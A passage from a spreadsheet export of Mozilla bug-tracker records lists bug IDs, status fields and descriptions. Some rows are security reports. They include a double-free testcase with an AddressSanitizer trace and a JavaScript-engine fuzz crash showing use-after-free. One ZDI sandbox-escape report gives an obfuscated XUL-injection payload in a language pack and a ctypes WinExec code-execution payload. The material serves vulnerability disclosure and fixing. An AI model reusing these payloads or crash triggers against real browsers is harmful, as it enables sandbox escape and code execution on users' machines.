      <c r="L3249" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3249" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3249" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3249" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3249" t="inlineStr"/>
      <c r="Q3249" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3249" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3249" t="inlineStr">
        <is>
          <t>2014-11</t>
        </is>
      </c>
      <c r="T3249" t="n">
        <v>1</v>
      </c>
      <c r="U3249" t="n">
        <v>0</v>
      </c>
      <c r="V3249" t="n">
        <v>6</v>
      </c>
      <c r="W3249" t="inlineStr">
        <is>
          <t>This is blocking me from running the add-on compatibility upgrade for Firefox 34.
STR:
1) Go to https://addons.mozilla.org/en-US/admin/validation
Observed:
The Current Max Version drop down and the Target Version drop down say "Select an application first". However, the Firefox application is already selected, and changing the selection to anything else doesn't change anything in the drop downs.
Expected:
The versions should be shown.
It looks like the problem is that https://addons.mozilla.org/en-US/admin/validation/application_versions.json is returning a 500 error.</t>
        </is>
      </c>
      <c r="X3249" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3250">
      <c r="A3250" t="n">
        <v>1367946</v>
      </c>
      <c r="B3250" t="inlineStr">
        <is>
          <t>2017-05-25 18:43:28 -0700</t>
        </is>
      </c>
      <c r="C3250" t="inlineStr">
        <is>
          <t>Lower the priority of ESR45</t>
        </is>
      </c>
      <c r="D3250" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E3250" t="n">
        <v>1</v>
      </c>
      <c r="F3250" t="n">
        <v>1</v>
      </c>
      <c r="G3250" t="n">
        <v>5</v>
      </c>
      <c r="H3250" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3250" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3250" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3250" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3250" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3250" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3250" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3250" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3250" t="inlineStr"/>
      <c r="Q3250" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3250" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3250" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3250" t="n">
        <v>1</v>
      </c>
      <c r="U3250" t="n">
        <v>0</v>
      </c>
      <c r="V3250" t="n">
        <v>5</v>
      </c>
      <c r="W3250" t="inlineStr">
        <is>
          <t>Right now, we're riding out the clock on ESR45 support until June when we can officially kill it. In the mean time, however, we're still doing pointless HSTS/HPKP updates every day to it, contributing to backlogs across other more important branches. Can we knock it down to Try level?</t>
        </is>
      </c>
      <c r="X3250" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3251">
      <c r="A3251" t="n">
        <v>988675</v>
      </c>
      <c r="B3251" t="inlineStr">
        <is>
          <t>2014-03-26 18:54:07 -0700</t>
        </is>
      </c>
      <c r="C3251" t="inlineStr">
        <is>
          <t>Heap-double-free in nsXMLHttpRequest::GetResponse</t>
        </is>
      </c>
      <c r="D3251" t="inlineStr">
        <is>
          <t>2016-10-14 13:21:56 -0700</t>
        </is>
      </c>
      <c r="E3251" t="n">
        <v>1</v>
      </c>
      <c r="F3251" t="n">
        <v>1</v>
      </c>
      <c r="G3251" t="n">
        <v>3</v>
      </c>
      <c r="H3251" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3251" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3251" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K3251" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3251" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3251" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3251" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3251" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P3251" t="inlineStr"/>
      <c r="Q3251" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3251" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3251" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3251" t="n">
        <v>1</v>
      </c>
      <c r="U3251" t="n">
        <v>0</v>
      </c>
      <c r="V3251" t="n">
        <v>21</v>
      </c>
      <c r="W3251" t="inlineStr">
        <is>
          <t>Testcase (save this to test.html and place in moz_tests/dom/workers/test/ and load this testcase over http).
&gt;&lt;script&gt;
  var worker = new Worker("xhr2_worker.js");
  worker.onmessage = function(event) {
  }
  worker.postMessage("testXHR.txt");
&lt;/script&gt;
=================================================================
==28570==ERROR: AddressSanitizer: attempting double-free on 0x60900088f760 in thread T0:
    #0 0x473ffb in realloc _asan_rtl_
    #1 0x7fec0b2f2c32 in AllocateArrayBufferContents(JSContext*, unsigned int, void*, unsigned long) objdir-ff-asan/js/src/../../dist/include/js/Utility.h:152
    #2 0x7fec078b63a2 in nsXMLHttpRequest::GetResponse(JSContext*, mozilla::ErrorResult&amp;) content/base/src/nsXMLHttpRequest.cpp:3864
    #3 0x7fec078b58a6 in nsXMLHttpRequest::GetResponse(JSContext*, JS::MutableHandle&lt;JS::Value&gt;) content/base/src/nsXMLHttpRequest.cpp:931
    #4 0x7fec073615c3 in (anonymous namespace)::EventRunnable::PreDispatch(JSContext*, mozilla::dom::workers::WorkerPrivate*) dom/workers/XMLHttpRequest.cpp:1162
    #5 0x7fec0734b289 in mozilla::dom::workers::WorkerRunnable::Dispatch(JSContext*) dom/workers/WorkerRunnable.cpp:104
    #6 0x7fec07353891 in mozilla::dom::workers::Proxy::HandleEvent(nsIDOMEvent*) dom/workers/XMLHttpRequest.cpp:1059
    #7 0x7fec0700db20 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:954
    #8 0x7fec0700ecf0 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1015
    #9 0x7fec06fff631 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:287
    #10 0x7fec07003746 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) dom/events/EventDispatcher.cpp:597
    #11 0x7fec06fcf485 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) dom/events/EventDispatcher.cpp:661
    #12 0x7fec078b8a16 in nsXMLHttpRequest::DispatchProgressEvent(nsDOMEventTargetHelper*, nsAString_internal const&amp;, bool, unsigned long, unsigned long) content/base/src/nsXMLHttpRequest.cpp:1448
    #13 0x7fec078c5045 in nsXMLHttpRequest::ChangeStateToDone() content/base/src/nsXMLHttpRequest.cpp:2215
    #14 0x7fec078c4578 in nsXMLHttpRequest::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) content/base/src/nsXMLHttpRequest.cpp:2195
    #15 0x7fec0775670e in nsCORSListenerProxy::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) content/base/src/nsCrossSiteListenerProxy.cpp:655
    #16 0x7fec042bb09b in nsStreamListenerTee::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/base/src/nsStreamListenerTee.cpp:53
    #17 0x7fec0456b977 in mozilla::net::nsHttpChannel::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/protocol/http/nsHttpChannel.cpp:5241
    #18 0x7fec0425e2e1 in nsInputStreamPump::OnStateStop() netwerk/base/src/nsInputStreamPump.cpp:703
    #19 0x7fec0425c915 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) netwerk/base/src/nsInputStreamPump.cpp:438
    #20 0x7fec040c05a9 in nsInputStreamReadyEvent::Run() xpcom/io/nsStreamUtils.cpp:85
    #21 0x7fec040f5bd0 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:694
    #22 0x7fec03fc18ea in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
    #23 0x7fec048b7cd9 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:95
    #24 0x7fec04860cd0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:226
    #25 0x7fec069bf467 in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:164
    #26 0x7fec097d3f88 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:276
    #27 0x7fec09643473 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4008
    #28 0x7fec0964435d in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4077
    #29 0x7fec096451ad in XRE_main toolkit/xre/nsAppRunner.cpp:4289
    #30 0x48c6e7 in main browser/app/nsBrowserApp.cpp:282
    #31 0x7fec12631de4 in __libc_start_main /build/buildd/eglibc-2.17/csu/libc-start.c:260
0x60900088f760 is located 0 bytes inside of 1-byte region [0x60900088f760,0x60900088f761)
freed by thread T0 here:
    #0 0x473ffb in realloc _asan_rtl_
    #1 0x7fec0b2f2c32 in AllocateArrayBufferContents(JSContext*, unsigned int, void*, unsigned long) objdir-ff-asan/js/src/../../dist/include/js/Utility.h:152
    #2 0x7fec078b63a2 in nsXMLHttpRequest::GetResponse(JSContext*, mozilla::ErrorResult&amp;) content/base/src/nsXMLHttpRequest.cpp:3864
    #3 0x7fec078b58a6 in nsXMLHttpRequest::GetResponse(JSContext*, JS::MutableHandle&lt;JS::Value&gt;) content/base/src/nsXMLHttpRequest.cpp:931
    #4 0x7fec073615c3 in (anonymous namespace)::EventRunnable::PreDispatch(JSContext*, mozilla::dom::workers::WorkerPrivate*) dom/workers/XMLHttpRequest.cpp:1162
    #5 0x7fec0734b289 in mozilla::dom::workers::WorkerRunnable::Dispatch(JSContext*) dom/workers/WorkerRunnable.cpp:104
    #6 0x7fec07353891 in mozilla::dom::workers::Proxy::HandleEvent(nsIDOMEvent*) dom/workers/XMLHttpRequest.cpp:1059
    #7 0x7fec0700db20 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:954
    #8 0x7fec0700ecf0 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1015
    #9 0x7fec06fff631 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:287
    #10 0x7fec07003746 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) dom/events/EventDispatcher.cpp:597
    #11 0x7fec06fcf485 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) dom/events/EventDispatcher.cpp:661
    #12 0x7fec078b8472 in nsXMLHttpRequest::ChangeState(unsigned int, bool) content/base/src/nsXMLHttpRequest.cpp:3296
    #13 0x7fec078c4e6e in nsXMLHttpRequest::ChangeStateToDone() content/base/src/nsXMLHttpRequest.cpp:2208
    #14 0x7fec078c4578 in nsXMLHttpRequest::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) content/base/src/nsXMLHttpRequest.cpp:2195
    #15 0x7fec0775670e in nsCORSListenerProxy::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) content/base/src/nsCrossSiteListenerProxy.cpp:655
    #16 0x7fec042bb09b in nsStreamListenerTee::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/base/src/nsStreamListenerTee.cpp:53
    #17 0x7fec0456b977 in mozilla::net::nsHttpChannel::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/protocol/http/nsHttpChannel.cpp:5241
    #18 0x7fec0425e2e1 in nsInputStreamPump::OnStateStop() netwerk/base/src/nsInputStreamPump.cpp:703
    #19 0x7fec0425c915 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) netwerk/base/src/nsInputStreamPump.cpp:438
    #20 0x7fec040c05a9 in nsInputStreamReadyEvent::Run() xpcom/io/nsStreamUtils.cpp:85
    #21 0x7fec040f5bd0 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:694
    #22 0x7fec03fc18ea in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
    #23 0x7fec048b7cd9 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:95
    #24 0x7fec04860cd0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:226
    #25 0x7fec069bf467 in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:164
    #26 0x7fec097d3f88 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:276
    #27 0x7fec09643473 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4008
    #28 0x7fec0964435d in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4077
    #29 0x7fec096451ad in XRE_main toolkit/xre/nsAppRunner.cpp:4289
previously allocated by thread T0 here:
    #0 0x473e91 in calloc _asan_rtl_
    #1 0x7fec078c3f62 in nsXMLHttpRequest::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) content/base/src/nsXMLHttpRequest.cpp:3864
    #2 0x7fec0775670e in nsCORSListenerProxy::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) content/base/src/nsCrossSiteListenerProxy.cpp:655
    #3 0x7fec042bb09b in nsStreamListenerTee::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/base/src/nsStreamListenerTee.cpp:53
    #4 0x7fec0456b977 in mozilla::net::nsHttpChannel::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/protocol/http/nsHttpChannel.cpp:5241
    #5 0x7fec0425e2e1 in nsInputStreamPump::OnStateStop() netwerk/base/src/nsInputStreamPump.cpp:703
    #6 0x7fec0425c915 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) netwerk/base/src/nsInputStreamPump.cpp:438
    #7 0x7fec040c05a9 in nsInputStreamReadyEvent::Run() xpcom/io/nsStreamUtils.cpp:85
    #8 0x7fec040f5bd0 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:694
    #9 0x7fec03fc18ea in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
    #10 0x7fec048b7cd9 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:95
    #11 0x7fec04860cd0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:226
    #12 0x7fec069bf467 in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:164
    #13 0x7fec097d3f88 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:276
    #14 0x7fec09643473 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4008
    #15 0x7fec0964435d in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4077
    #16 0x7fec096451ad in XRE_main toolkit/xre/nsAppRunner.cpp:4289
    #17 0x48c6e7 in main browser/app/nsBrowserApp.cpp:282
    #18 0x7fec12631de4 in __libc_start_main /build/buildd/eglibc-2.17/csu/libc-start.c:260
SUMMARY: AddressSanitizer: double-free ??:0 ??
==28570==ABORTING</t>
        </is>
      </c>
      <c r="X3251" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3252">
      <c r="A3252" t="n">
        <v>1238935</v>
      </c>
      <c r="B3252" t="inlineStr">
        <is>
          <t>2016-01-12 05:55:35 -0800</t>
        </is>
      </c>
      <c r="C3252" t="inlineStr">
        <is>
          <t>Crash [@ ObjectType] or Crash [@ CanInlineSetPropTypeCheck] with use-after-free</t>
        </is>
      </c>
      <c r="D3252" t="inlineStr">
        <is>
          <t>2016-12-01 13:31:04 -0800</t>
        </is>
      </c>
      <c r="E3252" t="n">
        <v>1</v>
      </c>
      <c r="F3252" t="n">
        <v>1</v>
      </c>
      <c r="G3252" t="n">
        <v>3</v>
      </c>
      <c r="H3252" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3252" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3252" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3252" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3252" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3252" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3252" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3252" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3252" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main45+]</t>
        </is>
      </c>
      <c r="Q3252" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3252" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3252" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T3252" t="n">
        <v>1</v>
      </c>
      <c r="U3252" t="n">
        <v>0</v>
      </c>
      <c r="V3252" t="n">
        <v>24</v>
      </c>
      <c r="W3252" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 6020a4cb41a7 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --disable-tests --disable-debug, run with --fuzzing-safe --no-threads --disable-oom-functions --baseline-eager --ion-eager):
setJitCompilerOption("ion.warmup.trigger", 20)
Native = function(k) {
    d = k.initialize;
    j = function(n, l, o) n.prototype[l] = o;
    d.implement = function(m) {
      for (n in m) 
        j(this, n, m[n]);
    }
};
Native({ initialize: Function });
function $mixin(e) {
    for (d = 1;;) {
        var b = arguments[d];
        for (c in b) 
          e[String];
        e[c] = $unlink();
    }
}
function $type(a) {
    return typeof a;
}
function $unlink() {
    if ($type(c) == "object")
      b = {};
    return b;
}
Function.implement({
    extend(a) {
        for (var b in a)
          this[b] = a[b];
        return this;
    }
})
function Class(b) {
    a = function() {
        Object.reset(this);
    }.extend(this);
    a.implement(b);
    return a;
}
Object.reset = function(a, c) {
    if (c == null)
      for (e in a) 
        Object.reset(a, e);
    switch ($type([])) {
        case "object":
            d = function() {};
            d.prototype = a[c];
            var b = new d;
            a[c] = b;
    }
}
new Native({ initialize: Class });
Class.implement({
    implement(a, d) {
        if ($type(a) == "object")
            for (e in a) 
              this.implement(e, a[e]);
        f = Class.Mutators[a];
        if (f)
          f.call(this, d);
        c = this.prototype;
        switch ($type(d)) {
            case "object":
                var b = c[a];
                if ($type(b) == "object")
                  $mixin(b, d);
                c[a] = $unlink();
        }
    }
})
Class.Mutators = {
    Extends(a) {
      this.prototype = new a;
    }
}
new Class({
    Extends: new Class({ options: {} }),
    options: { postVar : "" }
})
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
ObjectType (obj=0xf66003b0) at js/src/vm/TypeInference-inl.h:146
#0  ObjectType (obj=0xf66003b0) at js/src/vm/TypeInference-inl.h:146
#1  GetValueType (val=...) at js/src/vm/TypeInference-inl.h:171
#2  CanInlineSetPropTypeCheck (obj=obj@entry=0xf654c310, id=..., checkTypeset=checkTypeset@entry=0xffffa980, val=...) at js/src/jit/IonCaches.cpp:3179
#3  0x08225e9f in IsPropertySetInlineable (checkTypeset=0xffffa980, needsTypeBarrier=true, pshape=..., id=..., obj=0xf654c310, val=...) at js/src/jit/IonCaches.cpp:3226
#4  CanAttachNativeSetProp (checkTypeset=0xffffa980, shape=..., holder=..., needsTypeBarrier=true, id=..., obj=..., cx=0xf7a72040, val=...) at js/src/jit/IonCaches.cpp:3308
#5  js::jit::SetPropertyIC::tryAttachNative (this=this@entry=0xf7a9c8c0, cx=cx@entry=0xf7a72040, outerScript=outerScript@entry=..., ion=ion@entry=0xf7a9c800, obj=obj@entry=..., id=id@entry=..., emitted=emitted@entry=0xffffaa70, tryNativeAddSlot=tryNativeAddSlot@entry=0xffffaa80) at js/src/jit/IonCaches.cpp:3526
#6  0x0822ca0a in js::jit::SetPropertyIC::tryAttachStub (this=this@entry=0xf7a9c8c0, cx=cx@entry=0xf7a72040, outerScript=outerScript@entry=..., ion=ion@entry=0xf7a9c800, obj=obj@entry=..., idval=idval@entry=..., value=value@entry=..., id=id@entry=..., emitted=emitted@entry=0xffffaa70, tryNativeAddSlot=tryNativeAddSlot@entry=0xffffaa80) at js/src/jit/IonCaches.cpp:3594
#7  0x0822cca3 in js::jit::SetPropertyIC::update (cx=0xf7a72040, outerScript=..., cacheIndex=0, obj=..., idval=..., value=...) at js/src/jit/IonCaches.cpp:3691
#8  0xf7fcb0f5 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
eax	0x2b2b2b2b	724249387
ebx	0x947c3dc	155698140
ecx	0xf65495e0	-162228768
edx	0xf64aabd0	-162878512
esi	0xf64aabf0	-162878480
edi	0xf654c310	-162217200
ebp	0xf6549000	4132737024
esp	0xffffa920	4294945056
eip	0x821222d &lt;CanInlineSetPropTypeCheck(JSObject*, jsid, bool*)+589&gt;
=&gt; 0x821222d &lt;CanInlineSetPropTypeCheck(JSObject*, jsid, bool*)+589&gt;:	testb  $0x2,0xc(%eax)
   0x8212231 &lt;CanInlineSetPropTypeCheck(JSObject*, jsid, bool*)+593&gt;:	mov    %eax,0xc(%esp)
The testcase crashes with pattern 0x2b2b2b2b indicating a use-after-free. Marking sec-critical until shown otherwise.</t>
        </is>
      </c>
      <c r="X3252" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3253">
      <c r="A3253" t="n">
        <v>1538007</v>
      </c>
      <c r="B3253" t="inlineStr">
        <is>
          <t>2019-03-21 14:29:03 -0700</t>
        </is>
      </c>
      <c r="C3253" t="inlineStr">
        <is>
          <t>[ZDI-CAN-8374] Sandbox escape: XUL injection in language pack</t>
        </is>
      </c>
      <c r="D3253" t="inlineStr">
        <is>
          <t>2021-10-20 13:25:28 -0700</t>
        </is>
      </c>
      <c r="E3253" t="n">
        <v>1</v>
      </c>
      <c r="F3253" t="n">
        <v>1</v>
      </c>
      <c r="G3253" t="n">
        <v>3</v>
      </c>
      <c r="H3253" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3253" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3253" t="inlineStr">
        <is>
          <t>Internationalization: Localization</t>
        </is>
      </c>
      <c r="K3253" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3253" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3253" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3253" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3253" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3253" t="inlineStr">
        <is>
          <t>[adv-main68+][adv-esr60.8+]</t>
        </is>
      </c>
      <c r="Q3253" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3253" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3253" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3253" t="n">
        <v>1</v>
      </c>
      <c r="U3253" t="n">
        <v>0</v>
      </c>
      <c r="V3253" t="n">
        <v>46</v>
      </c>
      <c r="W3253" t="inlineStr">
        <is>
          <t>Created attachment 9052727
ZDI-CAN-8373-8374.zip
# Sandbox escape: XUL injection in language pack
With the ability to install language packs we can achieve multiple XUL injections,
for example on the `about:telemetry` page. Language packs can be installed
via `window.navigator.mozAddonManager` API which is accessible from a compromised
renderer.
To exploit this issue without having to put a malicious language pack through
a manual review, we turn code execution into UXSS by disabling renderer-side
security checks, log into addons.mozilla.org, and use the AddonManager API
to install an unlisted language pack for the en-US locale. It contains the
following XML:
    &lt;!ENTITY aboutTelemetry.firefoxDataDoc "Die &lt;img src='x:x'
        onerror='window[`ev`+`al`](window[`at`+`ob`](`aD1sb2NhdGlvbi5oYXNoO2lmKGgpZXZhbChhdG9iKGguc2xpY2UoMSkpKQ`))' /&gt;...
This includes some obfuscation to make it less likely to be marked for review
by the signing service. With this language pack installed, we can then
navigate to `about:telemetry#&lt;base64&gt;` using the IWebNavigator interface to
trigger arbitrary JavaScript execution in an XUL context. The final payload is:
    let { ctypes } = Components.utils.import("resource://gre/modules/ctypes.jsm", {});
    let k32 = ctypes.open('kernel32.dll');
    let WinExec = k32.declare('WinExec', ctypes.winapi_abi, ctypes.int32_t, ctypes.char.ptr, ctypes.int32_t);
    WinExec('calc.exe\0', 5);</t>
        </is>
      </c>
      <c r="X3253" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3254">
      <c r="A3254" t="n">
        <v>306689</v>
      </c>
      <c r="B3254" t="inlineStr">
        <is>
          <t>2005-09-01 05:14:29 -0700</t>
        </is>
      </c>
      <c r="C3254" t="inlineStr">
        <is>
          <t>XULRunner stub executable for win/linux</t>
        </is>
      </c>
      <c r="D3254" t="inlineStr">
        <is>
          <t>2016-02-12 08:12:53 -0800</t>
        </is>
      </c>
      <c r="E3254" t="n">
        <v>1</v>
      </c>
      <c r="F3254" t="n">
        <v>1</v>
      </c>
      <c r="G3254" t="n">
        <v>6</v>
      </c>
      <c r="H3254" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3254" t="inlineStr">
        <is>
          <t>Toolkit Graveyard</t>
        </is>
      </c>
      <c r="J3254" t="inlineStr">
        <is>
          <t>XULRunner</t>
        </is>
      </c>
      <c r="K3254" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3254" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3254" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3254" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3254" t="inlineStr"/>
      <c r="Q3254" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3254" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3254" t="inlineStr">
        <is>
          <t>mozilla1.8beta5</t>
        </is>
      </c>
      <c r="T3254" t="n">
        <v>1</v>
      </c>
      <c r="U3254" t="n">
        <v>0</v>
      </c>
      <c r="V3254" t="n">
        <v>9</v>
      </c>
      <c r="W3254" t="inlineStr">
        <is>
          <t>Parallels bug 299991, for linux/win.</t>
        </is>
      </c>
      <c r="X3254" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3255">
      <c r="A3255" t="n">
        <v>1581615</v>
      </c>
      <c r="B3255" t="inlineStr">
        <is>
          <t>2019-09-16 12:33:20 -0700</t>
        </is>
      </c>
      <c r="C3255" t="inlineStr">
        <is>
          <t>Q3 Edition - Humans &amp; Foxes</t>
        </is>
      </c>
      <c r="D3255" t="inlineStr">
        <is>
          <t>2019-09-27 08:11:30 -0700</t>
        </is>
      </c>
      <c r="E3255" t="n">
        <v>1</v>
      </c>
      <c r="F3255" t="n">
        <v>1</v>
      </c>
      <c r="G3255" t="n">
        <v>5</v>
      </c>
      <c r="H3255" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3255" t="inlineStr">
        <is>
          <t>User Research</t>
        </is>
      </c>
      <c r="J3255" t="inlineStr">
        <is>
          <t>Project Request</t>
        </is>
      </c>
      <c r="K3255" t="inlineStr">
